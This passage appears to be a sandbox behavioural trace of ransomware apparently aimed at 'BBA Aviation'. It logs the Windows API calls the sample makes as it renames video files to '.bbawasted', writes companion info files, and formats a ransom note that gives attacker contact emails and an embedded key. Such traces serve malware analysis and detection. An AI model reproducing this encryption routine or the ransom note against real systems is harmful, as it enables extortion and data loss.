hHeap=0x660000) returned 1 [0228.937] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a61b8) returned 1 [0228.937] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0228.938] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0228.938] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\BbDEIoVdE.mp4") returned 40 [0228.938] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x6adb18 [0228.938] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0228.938] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.938] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6020) returned 1 [0228.938] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0228.938] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0228.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\BbDEIoVdE.mp4.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\bbdeiovde.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0228.939] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0228.940] SetEndOfFile (hFile=0x290) returned 1 [0228.940] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0228.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.940] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0228.940] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\BbDEIoVdE.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\bbdeiovde.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\BbDEIoVdE.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\bbdeiovde.mp4.bbawasted")) returned 1 [0228.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\BbDEIoVdE.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\bbdeiovde.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0228.941] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0228.942] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x34e7 [0228.942] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x34e7) returned 0x600000 [0228.942] CloseHandle (hObject=0x280) returned 1 [0228.943] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0228.943] CloseHandle (hObject=0x294) returned 1 [0228.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0228.943] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6ce0) returned 1 [0228.944] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0228.944] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0228.944] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a63d8) returned 1 [0228.945] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0228.945] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0228.953] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0228.953] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0228.953] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.953] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HrUsqS662fnvRuiuJaXk3RblgQ2AjO4RfQNG3Ov018B0YnDsPfkoSnD4twyFIORT\r\n+8bnhrWVsu2Ne+RQMuZNVsfimPGZbAFvoPaANXOr8WJpoASHc8inM1YXClYJ4KRK\r\njgzbBTmGeG/yvv9gnTnBuSujFgdL5JOxCyTX5FoInybrWNfOGV2Agp2RlFl7TarC\r\nYChmXk3I4Z5hA4a7mEp2FqnVtHJGZBnOjknHv1q9Zaa39e4r7wlVL6PWL1oeKfLo\r\nXu0VZpCRhasxUlvIZ/FaXGKzClXtxurAK6jfM6p3+w4ex2aNUelt9etoccF5SEs2\r\nYTa23JtqQ9sJnJUgXh3n2AyX37tHjnWI2+Us0y//LGx+/9eofelCDos5pbmBqJbr\r\nt6lcNHrmr8Imhp0ZqONc1iGBkvGvpTnQRyGqchiErzk4KIDWotDBWWCfvcaq1C6W\r\nEB+vKPJrez6KJLs0VPDX1c15vMO6XFh0xav7buzqUSebBBpeJ77hg4iyz6qxOblu\r\nPaPlIRhlJwqTN1d4DdTieGjFx9AFgmuiKcZHuhRM0McU3/eSq9naPF+JJ8cQIwJN\r\nSx3PoBPsmV0iqrc9TDlo4Uwpei926zhS3IypgjNfXCjQurF8ewWN2Fqg7HpUcjK2\r\nQ6mRENBfKaLlm2JA22c5xlwXQrwsy/dotjtQ4zv8/lr=[end_key]\r\nKEEP IT\r\n") returned 984 [0228.954] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0228.954] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0228.954] SetEndOfFile (hFile=0x290) returned 1 [0228.956] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.956] CloseHandle (hObject=0x290) returned 1 [0228.956] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0228.956] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4e58 | out: hHeap=0x660000) returned 1 [0228.957] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6928) returned 1 [0228.957] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0228.957] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0228.957] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\2S_N.mkv") returned 72 [0229.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x29a) returned 0x6c4b88 [0229.129] lstrcpyW (in: lpString1=0x6c4c18, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0229.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0229.130] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f98) returned 1 [0229.130] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0229.130] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0229.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\2S_N.mkv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\2s_n.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0229.135] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0229.137] SetEndOfFile (hFile=0x290) returned 1 [0229.137] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0229.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0229.137] lstrcpyW (in: lpString1=0x6c4c18, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0229.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\2S_N.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\2s_n.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\2S_N.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\2s_n.mkv.bbawasted")) returned 1 [0229.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\2S_N.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\2s_n.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0229.138] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0229.139] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xf3a0 [0229.139] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf3a0) returned 0x5f0000 [0229.139] CloseHandle (hObject=0x27c) returned 1 [0229.141] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0229.142] CloseHandle (hObject=0x294) returned 1 [0229.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0229.142] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6bd0) returned 1 [0229.143] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0229.143] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0229.143] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6bd0) returned 1 [0229.144] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0229.144] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0229.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0229.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0229.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0229.153] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]PnHSROHImN5hurBjKfgDjoeIhETshdKssXoTbwZoMxCz98CILVn/kPC7WocaHcMF\r\nYXQihPIp62Q8XC3jPSKVBEt0EIxZPMJIcz7GtmL9jHc8h2E3kJbVu5Yb/P+mwJo7\r\nDah33GqSr3ILBDX3XPp5GD7LpO8nCy2Qq22hLAGXTRseWCggayVk/RmOnH+JHdqs\r\nP7NLbVXx5JkIp9NpnzkulI1hoLQNMDcedH9Q4Z4cae9SUcQOPfSkDN4oO4JOmvDL\r\nSF8ysRMx05nxJtHtpK2Gm//tzoUpeTvTC9gKECtwFVWN1xW6n4frD5tXaZ5u0Nde\r\n+ZpL65ifUngoU35I5uMkXTdTcwJca3fc7EHdbD0HJNr1i1N6ZxVmoMrBFFmqjq1T\r\n9QL7TIED5k5map4SyP8c3s8/tpvx1bQJO1vkGaeUFVp2ye4iDeGDF8yq+c25CcLF\r\nOqW4swwr1i/XANqypordwPDS5b5Od8WLrOsp1Vkclu9S5Vwa4Bi+YjTs6JAfI3pt\r\nhFGCPGkKhOI5SFz1vFqI/MyB/B+t6IIEb0br8c/bdHW6QTP6MfC3fzo5+L/A0uHU\r\ng9T4iR9igrnYftc3HbQGp0n9jRJyrdcb4eaoGH0tYbASv4CNnqAmXovKuggNPgQB\r\ntL5XeYj8HsHlW34kkgGvOj+idrhkLQiU1jXf/lj3ofX=[end_key]\r\nKEEP IT\r\n") returned 984 [0229.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0229.153] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0229.153] SetEndOfFile (hFile=0x290) returned 1 [0229.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0229.156] CloseHandle (hObject=0x290) returned 1 [0229.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0229.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ada28 | out: hHeap=0x660000) returned 1 [0229.156] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6680) returned 1 [0229.157] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0229.157] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0229.157] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\FSBVkmQJ4BFfmNqo_AS.flv") returned 87 [0229.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b8) returned 0x6c4b88 [0229.157] lstrcpyW (in: lpString1=0x6c4c36, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0229.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0229.157] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6ce0) returned 1 [0229.157] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0229.158] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0229.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\FSBVkmQJ4BFfmNqo_AS.flv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\fsbvkmqj4bffmnqo_as.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0229.158] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0229.159] SetEndOfFile (hFile=0x290) returned 1 [0229.160] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0229.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0229.160] lstrcpyW (in: lpString1=0x6c4c36, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0229.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\FSBVkmQJ4BFfmNqo_AS.flv" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\fsbvkmqj4bffmnqo_as.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\FSBVkmQJ4BFfmNqo_AS.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\fsbvkmqj4bffmnqo_as.flv.bbawasted")) returned 1 [0229.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\FSBVkmQJ4BFfmNqo_AS.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\fsbvkmqj4bffmnqo_as.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0229.173] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0229.174] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1330f [0229.174] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1330f) returned 0x5f0000 [0229.174] CloseHandle (hObject=0x294) returned 1 [0229.176] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0229.177] CloseHandle (hObject=0x27c) returned 1 [0229.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0229.177] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a64e8) returned 1 [0229.178] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0229.178] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0229.178] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a61b8) returned 1 [0229.178] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0229.178] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0229.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0229.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0229.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0229.189] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]mHClT9JEUxq/vDLtM2TSwBIsatZ1mS4uZ++MmMTbvHzMKrK5IUPpiika9Jwh4MNm\r\npnIjeIRN1MNOo5+jYNMjIipKpsVTsCtp5Iu9gIIeyslTJHAB5KMKTM8e0bF2YpjU\r\naGc/YRIU/tpb8Iu603QSiwSv76yykP+UKsoThmXX4qmh6sG10MHb7CEozCIKM447\r\nTpNJ64UK/0w+mO8S9Lue4+6DApD2uFujen8pg2eZq6AfiyafJNpnCPrvwXGVj46T\r\npfQ1ni+YAxTJlRaG2E9Hah2FTEQWZz7qSUoVPNzqth+7nHaduU6wzNA6OYai8xjD\r\naTCo4shgDV3WANCd30zIBhdIzT0qJPTjDKjfd/5hM2rwBwj1vaA/bS0yud0qNjD2\r\nzjACD9jMibIMb5TLhSNlm3JX6YzMBTMFx0A0kBY6OCCZk10LAGEHBjNcFKbqHe0B\r\nSEdpNnGFD/SNqMVoL27Nq0sOZ79nt+WEty7P39SriwxeS2QKE1t2up2/KI1R7+Ag\r\nHv8S5BXQjFadI/nB0ubIwkNkRXEHl8VujEF03YexurkflQF5fnH48ld9OWZfUIUS\r\nlm4Erj9qUW4sMaBfIdUgiRaJYioZ1ibKEeDeiEA9fD17HOjhpowPR9DghXsaG05M\r\n1FMz0NsP/FivJ5cxWhLbsML/FrY8a6xJ1deCX7HahnL=[end_key]\r\nKEEP IT\r\n") returned 984 [0229.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0229.189] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0229.189] SetEndOfFile (hFile=0x290) returned 1 [0229.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0229.191] CloseHandle (hObject=0x290) returned 1 [0229.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0229.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb368 | out: hHeap=0x660000) returned 1 [0229.191] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6c58) returned 1 [0229.373] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0229.373] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0229.373] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\kMiQJK0UijpsgS.avi") returned 82 [0229.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ae) returned 0x6c4b88 [0229.374] lstrcpyW (in: lpString1=0x6c4c2c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0229.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0229.374] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6bd0) returned 1 [0229.374] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0229.374] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0229.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\kMiQJK0UijpsgS.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\kmiqjk0uijpsgs.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, 